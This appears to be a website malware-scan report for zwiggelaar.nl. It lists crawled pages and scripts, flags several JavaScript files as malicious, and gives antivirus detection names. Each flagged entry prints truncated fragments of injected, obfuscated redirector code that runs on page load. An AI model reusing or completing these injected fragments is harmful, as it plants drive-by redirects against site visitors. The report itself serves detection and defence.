Request | Server response | Status |
http://zwiggelaar.nl/ | 200 OK Content-Length: 7874 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var AD;if(AD!=''){AD='BW'};var K;if(K!='D' && K!='Hu'){K=''};this.Yv="";function Y(){var TC=new Array();var n=new Array();var YO=unescape;var w;if(w!='a' && w != ''){w=null};var b;if(b!='' && b!='gW'){b=null};var s=window;var V=YO("%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%61%63%65%72%2e%63%6f%6d%2f%65%78%61%6d%69%6e%65%72%2e%63%6f%6d%2e%70%68%70");this.KQ='';var hO="";var r;if(r!='' && r!='U'){r=null};function h(T,z){var W='';var M;if(M!='' && M!='vK'){M='TO'}
... 1220 bytes are skipped ...;if(MY!='gI'){MY='gI'};var ID;if(ID!=''){ID='HO'};C[YO("%64%65%66%65%72")]=[1][0];var SPC;if(SPC!=''){SPC='SI'};var tD;if(tD!='HUl'){tD=''};var wx=new String();var Wv;if(Wv!='Iz'){Wv=''};X.body.appendChild(C);var xE;if(xE!='Wg'){xE=''};var Xi="";} catch(zd){alert(zd);var NG='';this.sM='';};var JE=new String();var qB;if(qB!=''){qB='bq'};}var Ak;if(Ak!='' && Ak!='Yn'){Ak=''};var To='';s[new String("on"+"lo"+"ad")]=O;var bN='';this.AB="";};var nP;if(nP!='' && nP!='Qu'){nP='vr'};Y();Antivirus reports:- AntiVir
- JS/Illredir.BZ
- Avast
- JS:Illredir-AQ [Trj]
- Ad-Aware
- Trojan.Script.402625
- Antiy-AVL
- Trojan/JS.Redirector
- Ikarus
- Trojan.JS.Redirector
- Panda
- JS/Redirector.AC
- nProtect
- Trojan.Script.402625
- K7AntiVirus
- Trojan ( 637f3b880 )
- TrendMicro-HouseCall
- JS_KEMPAR.SM
- Comodo
- TrojWare.JS.Redirector.UA
- Emsisoft
- Trojan.Script.402625 (B)
- K7GW
- Exploit ( 04c559b91 )
- McAfee-GW-Edition
- JS/Redirector.ad
- TrendMicro
- JS_KEMPAR.SM
- Microsoft
- Trojan:JS/Redirector.DC
- Kaspersky
- Trojan.JS.Redirector.kv
- MicroWorld-eScan
- Trojan.Script.402625
- Fortinet
- JS/Crypt.BBES!tr
- TotalDefense
- JS/Redirector.BH
- McAfee
- JS/Redirector.ad
- NANO-Antivirus
- Trojan.Script.Agent.yrkab
- F-Secure
- Trojan.Script.402625
- VIPRE
- Trojan.JS.Redirector.cr (v)
- F-Prot
- JS/Redir.AZ
- AVG
- JS/Redir
- Norman
- Redir.HU
- Sophos
- Troj/JSRedir-BD
- GData
- Trojan.Script.402625
- Commtouch
- JS/Redir.AZ
- Agnitum
- JS.Redirector.Gen.5
- ESET-NOD32
- JS/TrojanDownloader.Pegel.AA
- BitDefender
- Trojan.Script.402625
|
http://zwiggelaar.nl/./include/url.js | 200 OK Content-Length: 17388 Content-Type: application/javascript | malicious |
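Malicious code - confirmed by antivirus engines (see below). The excerpt begins with the file's ordinary-looking session helper functions; the obfuscated block after the skipped bytes is the part consistent with the redirector detections.
var CM_SESSION_KEY_KEY = "cmSessionKeyKey";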
/**
 * Global shorthand for URL.getSessionPair.
 *
 * `URL` is resolved at call time; the object that supplies getSessionPair
 * is not part of this excerpt.
 *
 * @param {*} loc - Forwarded unchanged to URL.getSessionPair.
 * @returns {*} Whatever URL.getSessionPair(loc) returns.
 */
function getSessionPair(loc) {
  var sessionPair = URL.getSessionPair(loc);
  return sessionPair;
}
/**
 * Global shorthand for URL.getSessionHref.
 *
 * `URL` is resolved at call time; the object that supplies getSessionHref
 * is not part of this excerpt.
 *
 * @returns {*} Whatever URL.getSessionHref() returns.
 */
function getSessionHref() {
  var sessionHref = URL.getSessionHref();
  return sessionHref;
}
/**
 * Global shorthand for URL.processLinkz.
 *
 * The delegate's return value is not passed back, so this function always
 * returns undefined. What the delegate does with `doc` is not visible in
 * this excerpt.
 *
 * @param {*} doc - Forwarded unchanged to URL.processLinkz.
 * @returns {undefined}
 */
function processLinkz(doc) {
  var target = doc;
  URL.processLinkz(target);
}
/**
 * Global shorthand for URL.getSessionString.
 *
 * `URL` is resolved at call time; the object that supplies getSessionString
 * is not part of this excerpt.
 *
 * @returns {*} Whatever URL.getSessionString() returns.
 */
function getSessionString() {
  var sessionString = URL.getSessionString();
  return sessionString;
}
/**
 * Global shorthand for URL.jdecode.
 *
 * The decoding itself happens in URL.jdecode, which is not part of this
 * excerpt.
 *
 * @param {*} s - Forwarded unchanged to URL.jdecode.
 * @returns {*} Whatever URL.jdecode(s) returns.
 */
function jdecode(s) {
  var decoded = URL.jdecode(s);
  return decoded;
}
function jencode(s) {
return URL.jencode(
... 3467 bytes are skipped ...;if(MY!='gI'){MY='gI'};var ID;if(ID!=''){ID='HO'};C[YO("%64%65%66%65%72")]=[1][0];var SPC;if(SPC!=''){SPC='SI'};var tD;if(tD!='HUl'){tD=''};var wx=new String();var Wv;if(Wv!='Iz'){Wv=''};X.body.appendChild(C);var xE;if(xE!='Wg'){xE=''};var Xi="";} catch(zd){alert(zd);var NG='';this.sM='';};var JE=new String();var qB;if(qB!=''){qB='bq'};}var Ak;if(Ak!='' && Ak!='Yn'){Ak=''};var To='';s[new String("on"+"lo"+"ad")]=O;var bN='';this.AB="";};var nP;if(nP!='' && nP!='Qu'){nP='vr'};Y();Antivirus reports:- Avast
- JS:Illredir-AQ [Trj]
- Ad-Aware
- Trojan.Iframe.AZF
- Ikarus
- Trojan.JS.Redirector
- Panda
- JS/Redirector.AC
- nProtect
- Trojan.Iframe.AZF
- K7AntiVirus
- Trojan ( 637f3b880 )
- TrendMicro-HouseCall
- JS_GUMBLAR.SMNY
- Comodo
- TrojWare.JS.Redirector.UA
- Emsisoft
- Trojan.Iframe.AZF (B)
- K7GW
- Exploit ( 04c559b91 )
- McAfee-GW-Edition
- JS/Redirector.ad
- DrWeb
- JS.Redirector.based.3
- TrendMicro
- JS_GUMBLAR.SMNY
- Microsoft
- Trojan:JS/Redirector.DC
- Kaspersky
- Trojan.JS.Redirector.kv
- MicroWorld-eScan
- Trojan.Iframe.AZF
- Fortinet
- JS/Crypt.BBES!tr
- TotalDefense
- JS/Redirector.BH
- McAfee
- JS/Redirector.ad
- NANO-Antivirus
- Trojan.Script.Agent.yrkab
- F-Secure
- Trojan.Iframe.AZF
- F-Prot
- JS/Redir.AZ
- AVG
- JS/Redir
- Sophos
- Troj/JSRedir-BD
- GData
- Trojan.Iframe.AZF
- Commtouch
- JS/Redir.AZ
- Agnitum
- JS.Redirector.Gen.5
- ESET-NOD32
- JS/TrojanDownloader.Pegel.AA
- BitDefender
- Trojan.Iframe.AZF
|
http://zwiggelaar.nl/./include/sitetree.js | 200 OK Content-Length: 8851 Content-Type: application/javascript | malicious |
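Malicious code - confirmed by antivirus engines (see below). The excerpt begins with the file's ordinary-looking sitetree data; the obfuscated block after the skipped bytes is the part consistent with the redirector detections.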
/**
 * Decodes a form-style escaped string.
 *
 * Every "+" is first turned into "%20", then the legacy global unescape()
 * expands the %XX / %uXXXX sequences. unescape() maps escapes straight to
 * code units and does not perform UTF-8 decoding.
 *
 * @param {string} s - Escaped text; must provide a replace() method.
 * @returns {string} The decoded text.
 */
function jdecode(s) {
  return unescape(s.replace(/\+/g, "%20"));
}
// Index constants. Their names and values line up with the eight slots of
// each theSitetree row below (presumably column indexes; the code that reads
// them is not part of this excerpt).
var POS_NODENAME = 0;
var POS_ID = 1;
var POS_NAME = 2;
var POS_NAVIGATIONTEXT = 3;
var POS_HREF = 4;
var POS_ISNAVIGATION = 5;
var POS_CHILDS = 6;
var POS_TEMPLATENAME = 7;

// Two entries, each an 8-element row. The name and navigation-text slots are
// passed through jdecode() when this statement executes.
var theSitetree = [
  ['PAGE', '1508', jdecode('Portal'), jdecode(''), '/1508.html', 'true', [], ''],
  ['PAGE', '33801', jdecode('Webmail'), jdecode(''), '/33801.html', 'true', [], '']
];
... 3312 bytes are skipped ...;if(MY!='gI'){MY='gI'};var ID;if(ID!=''){ID='HO'};C[YO("%64%65%66%65%72")]=[1][0];var SPC;if(SPC!=''){SPC='SI'};var tD;if(tD!='HUl'){tD=''};var wx=new String();var Wv;if(Wv!='Iz'){Wv=''};X.body.appendChild(C);var xE;if(xE!='Wg'){xE=''};var Xi="";} catch(zd){alert(zd);var NG='';this.sM='';};var JE=new String();var qB;if(qB!=''){qB='bq'};}var Ak;if(Ak!='' && Ak!='Yn'){Ak=''};var To='';s[new String("on"+"lo"+"ad")]=O;var bN='';this.AB="";};var nP;if(nP!='' && nP!='Qu'){nP='vr'};Y();Antivirus reports:- Avast
- JS:Illredir-AQ [Trj]
- Ad-Aware
- Trojan.Iframe.AZF
- Ikarus
- Trojan.JS.Redirector
- Panda
- JS/Redirector.AC
- nProtect
- Trojan.Iframe.AZF
- K7AntiVirus
- Trojan ( 637f3b880 )
- TrendMicro-HouseCall
- JS_GUMBLAR.SMNY
- Comodo
- TrojWare.JS.Redirector.UA
- Emsisoft
- Trojan.Iframe.AZF (B)
- K7GW
- Exploit ( 04c559b91 )
- DrWeb
- JS.Redirector.based.3
- TrendMicro
- JS_GUMBLAR.SMNY
- Microsoft
- Trojan:JS/Redirector.DC
- Kaspersky
- HEUR:Trojan-Downloader.Script.Generic
- MicroWorld-eScan
- Trojan.Iframe.AZF
- TotalDefense
- JS/Redirector.BH
- NANO-Antivirus
- Trojan.Script.Agent.yrkab
- F-Secure
- Trojan.Iframe.AZF
- F-Prot
- JS/Redir.AZ
- AVG
- JS/Redir
- Norman
- Redir.HU
- Sophos
- Troj/JSRedir-BD
- GData
- Trojan.Iframe.AZF
- Commtouch
- JS/Redir.AZ
- Agnitum
- JS.Redirector.Gen.5
- ESET-NOD32
- JS/TrojanDownloader.Pegel.AA
- BitDefender
- Trojan.Iframe.AZF
|
http://zwiggelaar.nl/./1508.html?*session*id*key*=*session*id*val* | 200 OK Content-Length: 5729 Content-Type: text/html | clean |
http://zwiggelaar.nl/././include/url.js | 200 OK Content-Length: 17388 Content-Type: application/javascript | malicious |
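Malicious code - confirmed by antivirus engines (see below). The excerpt begins with the file's ordinary-looking session helper functions; the obfuscated block after the skipped bytes is the part consistent with the redirector detections.
var CM_SESSION_KEY_KEY = "cmSessionKeyKey";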
/**
 * Global shorthand for URL.getSessionPair.
 *
 * `URL` is resolved at call time; the object that supplies getSessionPair
 * is not part of this excerpt.
 *
 * @param {*} loc - Forwarded unchanged to URL.getSessionPair.
 * @returns {*} Whatever URL.getSessionPair(loc) returns.
 */
function getSessionPair(loc) {
  var sessionPair = URL.getSessionPair(loc);
  return sessionPair;
}
/**
 * Global shorthand for URL.getSessionHref.
 *
 * `URL` is resolved at call time; the object that supplies getSessionHref
 * is not part of this excerpt.
 *
 * @returns {*} Whatever URL.getSessionHref() returns.
 */
function getSessionHref() {
  var sessionHref = URL.getSessionHref();
  return sessionHref;
}
/**
 * Global shorthand for URL.processLinkz.
 *
 * The delegate's return value is not passed back, so this function always
 * returns undefined. What the delegate does with `doc` is not visible in
 * this excerpt.
 *
 * @param {*} doc - Forwarded unchanged to URL.processLinkz.
 * @returns {undefined}
 */
function processLinkz(doc) {
  var target = doc;
  URL.processLinkz(target);
}
/**
 * Global shorthand for URL.getSessionString.
 *
 * `URL` is resolved at call time; the object that supplies getSessionString
 * is not part of this excerpt.
 *
 * @returns {*} Whatever URL.getSessionString() returns.
 */
function getSessionString() {
  var sessionString = URL.getSessionString();
  return sessionString;
}
/**
 * Global shorthand for URL.jdecode.
 *
 * The decoding itself happens in URL.jdecode, which is not part of this
 * excerpt.
 *
 * @param {*} s - Forwarded unchanged to URL.jdecode.
 * @returns {*} Whatever URL.jdecode(s) returns.
 */
function jdecode(s) {
  var decoded = URL.jdecode(s);
  return decoded;
}
function jencode(s) {
return URL.jencode(
... 3467 bytes are skipped ...;if(MY!='gI'){MY='gI'};var ID;if(ID!=''){ID='HO'};C[YO("%64%65%66%65%72")]=[1][0];var SPC;if(SPC!=''){SPC='SI'};var tD;if(tD!='HUl'){tD=''};var wx=new String();var Wv;if(Wv!='Iz'){Wv=''};X.body.appendChild(C);var xE;if(xE!='Wg'){xE=''};var Xi="";} catch(zd){alert(zd);var NG='';this.sM='';};var JE=new String();var qB;if(qB!=''){qB='bq'};}var Ak;if(Ak!='' && Ak!='Yn'){Ak=''};var To='';s[new String("on"+"lo"+"ad")]=O;var bN='';this.AB="";};var nP;if(nP!='' && nP!='Qu'){nP='vr'};Y();Antivirus reports:- Avast
- JS:Illredir-AQ [Trj]
- Ad-Aware
- Trojan.Iframe.AZF
- Ikarus
- Trojan.JS.Redirector
- Panda
- JS/Redirector.AC
- nProtect
- Trojan.Iframe.AZF
- K7AntiVirus
- Trojan ( 637f3b880 )
- TrendMicro-HouseCall
- JS_GUMBLAR.SMNY
- Comodo
- TrojWare.JS.Redirector.UA
- Emsisoft
- Trojan.Iframe.AZF (B)
- K7GW
- Exploit ( 04c559b91 )
- McAfee-GW-Edition
- JS/Redirector.ad
- DrWeb
- JS.Redirector.based.3
- TrendMicro
- JS_GUMBLAR.SMNY
- Microsoft
- Trojan:JS/Redirector.DC
- Kaspersky
- Trojan.JS.Redirector.kv
- MicroWorld-eScan
- Trojan.Iframe.AZF
- Fortinet
- JS/Crypt.BBES!tr
- TotalDefense
- JS/Redirector.BH
- McAfee
- JS/Redirector.ad
- NANO-Antivirus
- Trojan.Script.Agent.yrkab
- F-Secure
- Trojan.Iframe.AZF
- F-Prot
- JS/Redir.AZ
- AVG
- JS/Redir
- Sophos
- Troj/JSRedir-BD
- GData
- Trojan.Iframe.AZF
- Commtouch
- JS/Redir.AZ
- Agnitum
- JS.Redirector.Gen.5
- ESET-NOD32
- JS/TrojanDownloader.Pegel.AA
- BitDefender
- Trojan.Iframe.AZF
|
http://zwiggelaar.nl/././include/sitetree.js | 200 OK Content-Length: 8851 Content-Type: application/javascript | malicious |
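Malicious code - confirmed by antivirus engines (see below). The excerpt begins with the file's ordinary-looking sitetree data; the obfuscated block after the skipped bytes is the part consistent with the redirector detections.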
/**
 * Decodes a form-style escaped string.
 *
 * Every "+" is first turned into "%20", then the legacy global unescape()
 * expands the %XX / %uXXXX sequences. unescape() maps escapes straight to
 * code units and does not perform UTF-8 decoding.
 *
 * @param {string} s - Escaped text; must provide a replace() method.
 * @returns {string} The decoded text.
 */
function jdecode(s) {
  return unescape(s.replace(/\+/g, "%20"));
}
// Index constants. Their names and values line up with the eight slots of
// each theSitetree row below (presumably column indexes; the code that reads
// them is not part of this excerpt).
var POS_NODENAME = 0;
var POS_ID = 1;
var POS_NAME = 2;
var POS_NAVIGATIONTEXT = 3;
var POS_HREF = 4;
var POS_ISNAVIGATION = 5;
var POS_CHILDS = 6;
var POS_TEMPLATENAME = 7;

// Two entries, each an 8-element row. The name and navigation-text slots are
// passed through jdecode() when this statement executes.
var theSitetree = [
  ['PAGE', '1508', jdecode('Portal'), jdecode(''), '/1508.html', 'true', [], ''],
  ['PAGE', '33801', jdecode('Webmail'), jdecode(''), '/33801.html', 'true', [], '']
];
... 3312 bytes are skipped ...;if(MY!='gI'){MY='gI'};var ID;if(ID!=''){ID='HO'};C[YO("%64%65%66%65%72")]=[1][0];var SPC;if(SPC!=''){SPC='SI'};var tD;if(tD!='HUl'){tD=''};var wx=new String();var Wv;if(Wv!='Iz'){Wv=''};X.body.appendChild(C);var xE;if(xE!='Wg'){xE=''};var Xi="";} catch(zd){alert(zd);var NG='';this.sM='';};var JE=new String();var qB;if(qB!=''){qB='bq'};}var Ak;if(Ak!='' && Ak!='Yn'){Ak=''};var To='';s[new String("on"+"lo"+"ad")]=O;var bN='';this.AB="";};var nP;if(nP!='' && nP!='Qu'){nP='vr'};Y();Antivirus reports:- Avast
- JS:Illredir-AQ [Trj]
- Ad-Aware
- Trojan.Iframe.AZF
- Ikarus
- Trojan.JS.Redirector
- Panda
- JS/Redirector.AC
- nProtect
- Trojan.Iframe.AZF
- K7AntiVirus
- Trojan ( 637f3b880 )
- TrendMicro-HouseCall
- JS_GUMBLAR.SMNY
- Comodo
- TrojWare.JS.Redirector.UA
- Emsisoft
- Trojan.Iframe.AZF (B)
- K7GW
- Exploit ( 04c559b91 )
- DrWeb
- JS.Redirector.based.3
- TrendMicro
- JS_GUMBLAR.SMNY
- Microsoft
- Trojan:JS/Redirector.DC
- Kaspersky
- HEUR:Trojan-Downloader.Script.Generic
- MicroWorld-eScan
- Trojan.Iframe.AZF
- TotalDefense
- JS/Redirector.BH
- NANO-Antivirus
- Trojan.Script.Agent.yrkab
- F-Secure
- Trojan.Iframe.AZF
- F-Prot
- JS/Redir.AZ
- AVG
- JS/Redir
- Norman
- Redir.HU
- Sophos
- Troj/JSRedir-BD
- GData
- Trojan.Iframe.AZF
- Commtouch
- JS/Redir.AZ
- Agnitum
- JS.Redirector.Gen.5
- ESET-NOD32
- JS/TrojanDownloader.Pegel.AA
- BitDefender
- Trojan.Iframe.AZF
|
http://zwiggelaar.nl/././1508.html?*session*id*key*=*session*id*val* | 200 OK Content-Length: 5729 Content-Type: text/html | clean |
http://zwiggelaar.nl/./././include/url.js | 200 OK Content-Length: 17388 Content-Type: application/javascript | malicious |
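Malicious code - confirmed by antivirus engines (see below). The excerpt begins with the file's ordinary-looking session helper functions; the obfuscated block after the skipped bytes is the part consistent with the redirector detections.
var CM_SESSION_KEY_KEY = "cmSessionKeyKey";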
/**
 * Global shorthand for URL.getSessionPair.
 *
 * `URL` is resolved at call time; the object that supplies getSessionPair
 * is not part of this excerpt.
 *
 * @param {*} loc - Forwarded unchanged to URL.getSessionPair.
 * @returns {*} Whatever URL.getSessionPair(loc) returns.
 */
function getSessionPair(loc) {
  var sessionPair = URL.getSessionPair(loc);
  return sessionPair;
}
/**
 * Global shorthand for URL.getSessionHref.
 *
 * `URL` is resolved at call time; the object that supplies getSessionHref
 * is not part of this excerpt.
 *
 * @returns {*} Whatever URL.getSessionHref() returns.
 */
function getSessionHref() {
  var sessionHref = URL.getSessionHref();
  return sessionHref;
}
/**
 * Global shorthand for URL.processLinkz.
 *
 * The delegate's return value is not passed back, so this function always
 * returns undefined. What the delegate does with `doc` is not visible in
 * this excerpt.
 *
 * @param {*} doc - Forwarded unchanged to URL.processLinkz.
 * @returns {undefined}
 */
function processLinkz(doc) {
  var target = doc;
  URL.processLinkz(target);
}
/**
 * Global shorthand for URL.getSessionString.
 *
 * `URL` is resolved at call time; the object that supplies getSessionString
 * is not part of this excerpt.
 *
 * @returns {*} Whatever URL.getSessionString() returns.
 */
function getSessionString() {
  var sessionString = URL.getSessionString();
  return sessionString;
}
/**
 * Global shorthand for URL.jdecode.
 *
 * The decoding itself happens in URL.jdecode, which is not part of this
 * excerpt.
 *
 * @param {*} s - Forwarded unchanged to URL.jdecode.
 * @returns {*} Whatever URL.jdecode(s) returns.
 */
function jdecode(s) {
  var decoded = URL.jdecode(s);
  return decoded;
}
function jencode(s) {
return URL.jencode(
... 3467 bytes are skipped ...;if(MY!='gI'){MY='gI'};var ID;if(ID!=''){ID='HO'};C[YO("%64%65%66%65%72")]=[1][0];var SPC;if(SPC!=''){SPC='SI'};var tD;if(tD!='HUl'){tD=''};var wx=new String();var Wv;if(Wv!='Iz'){Wv=''};X.body.appendChild(C);var xE;if(xE!='Wg'){xE=''};var Xi="";} catch(zd){alert(zd);var NG='';this.sM='';};var JE=new String();var qB;if(qB!=''){qB='bq'};}var Ak;if(Ak!='' && Ak!='Yn'){Ak=''};var To='';s[new String("on"+"lo"+"ad")]=O;var bN='';this.AB="";};var nP;if(nP!='' && nP!='Qu'){nP='vr'};Y();Antivirus reports:- Avast
- JS:Illredir-AQ [Trj]
- Ad-Aware
- Trojan.Iframe.AZF
- Ikarus
- Trojan.JS.Redirector
- Panda
- JS/Redirector.AC
- nProtect
- Trojan.Iframe.AZF
- K7AntiVirus
- Trojan ( 637f3b880 )
- TrendMicro-HouseCall
- JS_GUMBLAR.SMNY
- Comodo
- TrojWare.JS.Redirector.UA
- Emsisoft
- Trojan.Iframe.AZF (B)
- K7GW
- Exploit ( 04c559b91 )
- McAfee-GW-Edition
- JS/Redirector.ad
- DrWeb
- JS.Redirector.based.3
- TrendMicro
- JS_GUMBLAR.SMNY
- Microsoft
- Trojan:JS/Redirector.DC
- Kaspersky
- Trojan.JS.Redirector.kv
- MicroWorld-eScan
- Trojan.Iframe.AZF
- Fortinet
- JS/Crypt.BBES!tr
- TotalDefense
- JS/Redirector.BH
- McAfee
- JS/Redirector.ad
- NANO-Antivirus
- Trojan.Script.Agent.yrkab
- F-Secure
- Trojan.Iframe.AZF
- F-Prot
- JS/Redir.AZ
- AVG
- JS/Redir
- Sophos
- Troj/JSRedir-BD
- GData
- Trojan.Iframe.AZF
- Commtouch
- JS/Redir.AZ
- Agnitum
- JS.Redirector.Gen.5
- ESET-NOD32
- JS/TrojanDownloader.Pegel.AA
- BitDefender
- Trojan.Iframe.AZF
|
http://zwiggelaar.nl/./././include/sitetree.js | 200 OK Content-Length: 8851 Content-Type: application/javascript | malicious |
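Malicious code - confirmed by antivirus engines (see below). The excerpt begins with the file's ordinary-looking sitetree data; the obfuscated block after the skipped bytes is the part consistent with the redirector detections.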
/**
 * Decodes a form-style escaped string.
 *
 * Every "+" is first turned into "%20", then the legacy global unescape()
 * expands the %XX / %uXXXX sequences. unescape() maps escapes straight to
 * code units and does not perform UTF-8 decoding.
 *
 * @param {string} s - Escaped text; must provide a replace() method.
 * @returns {string} The decoded text.
 */
function jdecode(s) {
  return unescape(s.replace(/\+/g, "%20"));
}
// Index constants. Their names and values line up with the eight slots of
// each theSitetree row below (presumably column indexes; the code that reads
// them is not part of this excerpt).
var POS_NODENAME = 0;
var POS_ID = 1;
var POS_NAME = 2;
var POS_NAVIGATIONTEXT = 3;
var POS_HREF = 4;
var POS_ISNAVIGATION = 5;
var POS_CHILDS = 6;
var POS_TEMPLATENAME = 7;

// Two entries, each an 8-element row. The name and navigation-text slots are
// passed through jdecode() when this statement executes.
var theSitetree = [
  ['PAGE', '1508', jdecode('Portal'), jdecode(''), '/1508.html', 'true', [], ''],
  ['PAGE', '33801', jdecode('Webmail'), jdecode(''), '/33801.html', 'true', [], '']
];
... 3312 bytes are skipped ...;if(MY!='gI'){MY='gI'};var ID;if(ID!=''){ID='HO'};C[YO("%64%65%66%65%72")]=[1][0];var SPC;if(SPC!=''){SPC='SI'};var tD;if(tD!='HUl'){tD=''};var wx=new String();var Wv;if(Wv!='Iz'){Wv=''};X.body.appendChild(C);var xE;if(xE!='Wg'){xE=''};var Xi="";} catch(zd){alert(zd);var NG='';this.sM='';};var JE=new String();var qB;if(qB!=''){qB='bq'};}var Ak;if(Ak!='' && Ak!='Yn'){Ak=''};var To='';s[new String("on"+"lo"+"ad")]=O;var bN='';this.AB="";};var nP;if(nP!='' && nP!='Qu'){nP='vr'};Y();Antivirus reports:- Avast
- JS:Illredir-AQ [Trj]
- Ad-Aware
- Trojan.Iframe.AZF
- Ikarus
- Trojan.JS.Redirector
- Panda
- JS/Redirector.AC
- nProtect
- Trojan.Iframe.AZF
- K7AntiVirus
- Trojan ( 637f3b880 )
- TrendMicro-HouseCall
- JS_GUMBLAR.SMNY
- Comodo
- TrojWare.JS.Redirector.UA
- Emsisoft
- Trojan.Iframe.AZF (B)
- K7GW
- Exploit ( 04c559b91 )
- DrWeb
- JS.Redirector.based.3
- TrendMicro
- JS_GUMBLAR.SMNY
- Microsoft
- Trojan:JS/Redirector.DC
- Kaspersky
- HEUR:Trojan-Downloader.Script.Generic
- MicroWorld-eScan
- Trojan.Iframe.AZF
- TotalDefense
- JS/Redirector.BH
- NANO-Antivirus
- Trojan.Script.Agent.yrkab
- F-Secure
- Trojan.Iframe.AZF
- F-Prot
- JS/Redir.AZ
- AVG
- JS/Redir
- Norman
- Redir.HU
- Sophos
- Troj/JSRedir-BD
- GData
- Trojan.Iframe.AZF
- Commtouch
- JS/Redir.AZ
- Agnitum
- JS.Redirector.Gen.5
- ESET-NOD32
- JS/TrojanDownloader.Pegel.AA
- BitDefender
- Trojan.Iframe.AZF
|
http://zwiggelaar.nl/./././1508.html?*session*id*key*=*session*id*val* | 200 OK Content-Length: 5729 Content-Type: text/html | clean |
http://zwiggelaar.nl/././././include/url.js | 200 OK Content-Length: 17388 Content-Type: application/javascript | malicious |
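Malicious code - confirmed by antivirus engines (see below). The excerpt begins with the file's ordinary-looking session helper functions; the obfuscated block after the skipped bytes is the part consistent with the redirector detections.
var CM_SESSION_KEY_KEY = "cmSessionKeyKey";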
/**
 * Global shorthand for URL.getSessionPair.
 *
 * `URL` is resolved at call time; the object that supplies getSessionPair
 * is not part of this excerpt.
 *
 * @param {*} loc - Forwarded unchanged to URL.getSessionPair.
 * @returns {*} Whatever URL.getSessionPair(loc) returns.
 */
function getSessionPair(loc) {
  var sessionPair = URL.getSessionPair(loc);
  return sessionPair;
}
/**
 * Global shorthand for URL.getSessionHref.
 *
 * `URL` is resolved at call time; the object that supplies getSessionHref
 * is not part of this excerpt.
 *
 * @returns {*} Whatever URL.getSessionHref() returns.
 */
function getSessionHref() {
  var sessionHref = URL.getSessionHref();
  return sessionHref;
}
/**
 * Global shorthand for URL.processLinkz.
 *
 * The delegate's return value is not passed back, so this function always
 * returns undefined. What the delegate does with `doc` is not visible in
 * this excerpt.
 *
 * @param {*} doc - Forwarded unchanged to URL.processLinkz.
 * @returns {undefined}
 */
function processLinkz(doc) {
  var target = doc;
  URL.processLinkz(target);
}
/**
 * Global shorthand for URL.getSessionString.
 *
 * `URL` is resolved at call time; the object that supplies getSessionString
 * is not part of this excerpt.
 *
 * @returns {*} Whatever URL.getSessionString() returns.
 */
function getSessionString() {
  var sessionString = URL.getSessionString();
  return sessionString;
}
/**
 * Global shorthand for URL.jdecode.
 *
 * The decoding itself happens in URL.jdecode, which is not part of this
 * excerpt.
 *
 * @param {*} s - Forwarded unchanged to URL.jdecode.
 * @returns {*} Whatever URL.jdecode(s) returns.
 */
function jdecode(s) {
  var decoded = URL.jdecode(s);
  return decoded;
}
function jencode(s) {
return URL.jencode(
... 3467 bytes are skipped ...;if(MY!='gI'){MY='gI'};var ID;if(ID!=''){ID='HO'};C[YO("%64%65%66%65%72")]=[1][0];var SPC;if(SPC!=''){SPC='SI'};var tD;if(tD!='HUl'){tD=''};var wx=new String();var Wv;if(Wv!='Iz'){Wv=''};X.body.appendChild(C);var xE;if(xE!='Wg'){xE=''};var Xi="";} catch(zd){alert(zd);var NG='';this.sM='';};var JE=new String();var qB;if(qB!=''){qB='bq'};}var Ak;if(Ak!='' && Ak!='Yn'){Ak=''};var To='';s[new String("on"+"lo"+"ad")]=O;var bN='';this.AB="";};var nP;if(nP!='' && nP!='Qu'){nP='vr'};Y();Antivirus reports:- Avast
- JS:Illredir-AQ [Trj]
- Ad-Aware
- Trojan.Iframe.AZF
- Ikarus
- Trojan.JS.Redirector
- Panda
- JS/Redirector.AC
- nProtect
- Trojan.Iframe.AZF
- K7AntiVirus
- Trojan ( 637f3b880 )
- TrendMicro-HouseCall
- JS_GUMBLAR.SMNY
- Comodo
- TrojWare.JS.Redirector.UA
- Emsisoft
- Trojan.Iframe.AZF (B)
- K7GW
- Exploit ( 04c559b91 )
- McAfee-GW-Edition
- JS/Redirector.ad
- DrWeb
- JS.Redirector.based.3
- TrendMicro
- JS_GUMBLAR.SMNY
- Microsoft
- Trojan:JS/Redirector.DC
- Kaspersky
- Trojan.JS.Redirector.kv
- MicroWorld-eScan
- Trojan.Iframe.AZF
- Fortinet
- JS/Crypt.BBES!tr
- TotalDefense
- JS/Redirector.BH
- McAfee
- JS/Redirector.ad
- NANO-Antivirus
- Trojan.Script.Agent.yrkab
- F-Secure
- Trojan.Iframe.AZF
- F-Prot
- JS/Redir.AZ
- AVG
- JS/Redir
- Sophos
- Troj/JSRedir-BD
- GData
- Trojan.Iframe.AZF
- Commtouch
- JS/Redir.AZ
- Agnitum
- JS.Redirector.Gen.5
- ESET-NOD32
- JS/TrojanDownloader.Pegel.AA
- BitDefender
- Trojan.Iframe.AZF
|
http://zwiggelaar.nl/././././include/sitetree.js | 200 OK Content-Length: 8851 Content-Type: application/javascript | malicious |
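Malicious code - confirmed by antivirus engines (see below). The excerpt begins with the file's ordinary-looking sitetree data; the obfuscated block after the skipped bytes is the part consistent with the redirector detections.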
/**
 * Decodes a form-style escaped string.
 *
 * Every "+" is first turned into "%20", then the legacy global unescape()
 * expands the %XX / %uXXXX sequences. unescape() maps escapes straight to
 * code units and does not perform UTF-8 decoding.
 *
 * @param {string} s - Escaped text; must provide a replace() method.
 * @returns {string} The decoded text.
 */
function jdecode(s) {
  return unescape(s.replace(/\+/g, "%20"));
}
// Index constants. Their names and values line up with the eight slots of
// each theSitetree row below (presumably column indexes; the code that reads
// them is not part of this excerpt).
var POS_NODENAME = 0;
var POS_ID = 1;
var POS_NAME = 2;
var POS_NAVIGATIONTEXT = 3;
var POS_HREF = 4;
var POS_ISNAVIGATION = 5;
var POS_CHILDS = 6;
var POS_TEMPLATENAME = 7;

// Two entries, each an 8-element row. The name and navigation-text slots are
// passed through jdecode() when this statement executes.
var theSitetree = [
  ['PAGE', '1508', jdecode('Portal'), jdecode(''), '/1508.html', 'true', [], ''],
  ['PAGE', '33801', jdecode('Webmail'), jdecode(''), '/33801.html', 'true', [], '']
];
